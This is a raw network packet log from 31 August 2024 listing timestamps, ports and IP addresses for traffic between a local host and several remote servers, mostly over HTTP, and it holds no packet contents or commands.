Aug 31, 2024 15:44:08.082796097 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082807064 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082814932 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082817078 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082844019 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082865953 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082923889 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082933903 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082947016 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082969904 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082989931 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082994938 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083005905 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083017111 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083029032 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083029985 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083048105 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083071947 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083159924 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083169937 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083179951 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083189011 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083199024 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083204985 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083219051 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083221912 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083233118 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083245039 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083245993 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083271980 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083304882 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083385944 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083436012 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083436966 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083446980 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083472967 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083489895 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083492041 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083529949 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083642006 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083652020 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083662033 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083671093 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083682060 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083692074 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083699942 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083713055 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083717108 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083724022 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083734035 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083739042 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083746910 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083762884 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083765030 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083775043 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083775043 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083785057 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083795071 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083812952 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083813906 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083823919 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083837986 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083842039 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083848000 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083858013 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083858013 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083868980 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083873987 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083879948 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.083904028 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.083930016 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.088546038 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.088583946 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.088598013 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.088598013 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.088608027 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.088633060 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.088633060 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.088649988 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.113866091 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.113943100 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.113953114 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.113949060 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.113969088 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.113982916 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.113991976 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.114001989 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.114001989 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.114011049 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.114047050 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.114100933 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.140666008 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140707016 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140716076 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140724897 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140736103 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140736103 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.140767097 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.140774012 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140784025 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140793085 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140813112 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.140844107 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.140849113 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140861988 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140872955 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140883923 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140892982 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140892982 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.140922070 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140937090 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.140958071 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.140978098 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.141016960 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.141590118 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.141648054 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.141683102 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.141699076 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.141710043 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.141719103 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.141727924 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.141735077 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.141740084 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.141751051 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.141781092 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.141823053 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143172026 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143189907 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143203020 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143218994 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143229008 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143229961 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143244028 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143253088 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143254042 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143300056 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143539906 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143572092 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143579960 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143595934 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143620014 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143636942 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143637896 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143654108 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143663883 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143673897 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143680096 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143686056 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143717051 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143735886 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143740892 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143743992 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143771887 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143781900 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143786907 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143791914 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143825054 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143845081 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143850088 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143893003 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.143910885 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.143954039 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169100046 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169110060 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169120073 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169133902 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169148922 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169158936 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169167995 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169177055 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169186115 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169197083 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169203997 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169213057 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169224024 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169231892 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169241905 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169253111 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169255018 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169286013 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169291973 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169318914 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169348955 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169358015 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169358969 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169409990 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169415951 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169415951 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169420958 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169426918 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169431925 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169446945 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169456959 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169475079 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169495106 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169504881 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169526100 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169558048 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169589043 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169598103 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169608116 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169620037 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169629097 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169639111 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169639111 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169666052 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169667959 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169675112 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169687986 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169696093 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169729948 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169814110 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169859886 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169872999 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169883966 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169915915 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.169941902 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169950962 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169960022 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169969082 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169980049 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.169987917 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170017004 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170017958 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170062065 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170142889 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170152903 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170161963 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170171022 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170181036 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170190096 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170197964 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170207977 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170217037 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170226097 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170234919 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170237064 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170279980 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170442104 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170469999 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170480013 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170512915 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170531988 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170541048 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170545101 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170546055 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170568943 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170583010 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170598984 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170599937 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170610905 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170622110 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.170624971 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.170665026 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.200505972 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.200541019 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.200551033 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.200642109 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.200664997 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.200666904 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.200675011 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.200685024 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.200694084 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.200701952 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.200731993 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.200769901 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.210155010 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:08.227818966 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.227863073 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.227890968 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.227900982 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.227921963 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.227972984 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.253212929 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:08.258101940 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:08.437428951 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:08.481664896 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:08.904876947 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.905411005 CEST	49716	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.910157919 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.910176039 CEST	80	49716	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.910211086 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.910254002 CEST	49716	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.910437107 CEST	49716	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.915232897 CEST	80	49716	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:09.653264999 CEST	80	49716	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:09.653335094 CEST	49716	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:10.204499960 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.209604979 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.209672928 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.209966898 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.214828968 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.948591948 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:10.953608990 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:10.953675985 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:10.961044073 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961069107 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961078882 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961102962 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.961132050 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.961138964 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961149931 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961158991 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961167097 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961179972 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961186886 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961189032 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.961199045 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.961230040 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.961267948 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.961308002 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.961808920 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:10.965935946 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.965981960 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.966010094 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.966048002 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.966175079 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.966185093 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.966195107 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:10.966217995 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.966238022 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:10.966684103 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:11.109416008 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.109431982 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.109493017 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.109493971 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.109827995 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.109863997 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.109875917 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.109879017 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.109889030 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.109909058 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.109920025 CEST	49717	80	192.168.2.5	185.215.113.26
